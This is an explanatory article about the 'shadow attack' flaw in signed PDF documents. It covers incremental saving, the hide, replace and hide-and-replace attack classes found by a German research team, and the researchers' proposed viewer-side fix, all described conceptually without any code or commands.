The more complex a format is, the less chance there is that its security features will work in all cases. A vulnerability has turned up that lets sneaky people alter digitally signed PDF documents. A German team discovered a “shadow attack” vulnerability in the format. It’s easiest to do this if the document’s creator designed it to be altered after signing. The victim sees one set of content and signs it; the dishonest creator gets the document back, changes its appearance, and passes it on.
A digital signature to a PDF confirms the signer’s identity, indicates assent to the document, and makes it tamper-evident. A signed file is, for all practical purposes, impossible to alter without invalidating the signature. However, there’s a problem. The signature doesn’t apply to the whole file. There are reasons for this. For example, multiple signatures might be required.
PDF files can be modified, though the process is clunky and inefficient. New content and changes to existing content are appended to the file without modifying existing objects. It’s called incremental saving (IS). It’s possible to modify even a signed file this way. The signature doesn’t apply to the new material. A signed file can be changed without limit this way. However, viewer applications warn the user if a file has been modified in this way.
The question is exactly what “modified” means. For the sake of convenience, features such as additional signatures and annotations don’t trigger a warning. There’s no universally accepted standard on what counts as real modification; different PDF readers do different checks. This leaves a lot of room for tinkering with files without setting off any alarms.
The research team discovered an assortment of ways to do this. In broad terms, they fall into three categories.
- Hide. A picture appears in the document. The attacker makes it invisible, showing the layer behind it, which was previously masked.
- Replace. New, supposedly harmless elements are appended to the signed document to alter its appearance. For instance, the attacker could add a font definition, changing the glyphs which are displayed.
- Hide and replace. The simplest and deadliest. The document to be signed contains a “shadow” document, which can be entirely different from the visible portion. The attacker changes just one reference so it points at the shadow document instead of the previously visible one.
The authors propose a change that doesn’t require changing the specification, just adopting a new convention in viewer applications. The new rule would be that if a document is signed, any revisions to it must also be signed. If it isn’t, the user will get an alert. It’s not clear how much this will help. People will see the final document and note that it’s been fully signed, but unless they compare the signature carefully with the previous one, they may not realize that the final signature covers major changes.
PDF is collapsing under the weight of many revisions, variants, and features. It’s not clear whether there is a good fix.